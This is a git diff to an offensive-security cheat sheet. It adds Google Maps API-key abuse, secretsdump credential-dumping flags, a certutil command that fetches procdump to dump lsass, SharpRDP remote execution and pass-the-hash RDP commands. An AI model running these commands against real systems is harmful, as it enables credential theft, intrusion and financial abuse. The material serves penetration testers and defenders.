diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index a269395..8be1b6f 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -6,6 +6,7 @@ - [Tools](#tools) - [Exploit](#exploit) + - [Google Maps](#google-maps) - [Algolia](#algolia) - [AWS Access Key ID & Secret](#aws-access-key-id--secret) - [Slack API Token](#slack-api-token) @@ -27,6 +28,14 @@ The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token. +### Google Maps + +Use : https://github.com/ozguralp/gmapsapiscanner/ + +Impact: +* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company +* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account + ### Algolia ```powershell diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 2ca3d36..04b3d51 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -489,10 +489,13 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL secretsdump also works remotely ```java -./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss +./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 ``` +* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. +* `-user-status`: Display whether or not the user is disabled. + #### Alternatives - modules Metasploit modules diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 5b8f937..0894a25 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -63,8 +63,11 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo Dump the lsass process. ```powershell -C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp +# HTTP method +certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe +C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp +# SMB method net use Z: https://live.sysinternals.com Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp ``` diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index e927607..75d708d 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -131,8 +131,15 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get ## RDP Remote Desktop Protocol +Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP) + +```powershell +SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password +``` + +Or connect remotely with `rdesktop` + ```powershell -python rdpcheck.py DOMAIN/username:password@10.10.10.10 rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 # -g : the screen will take up 70% of your actual screen size @@ -165,7 +172,7 @@ or with Metasploit run getgui -u admin -p 1234 ``` -Then log in using xfreerdp +or with xfreerdp ```powershell xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ @@ -173,7 +180,6 @@ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the xfreerd /u:runner /v:10.0.0.1 # password will be asked ``` - ## Netuse Windows only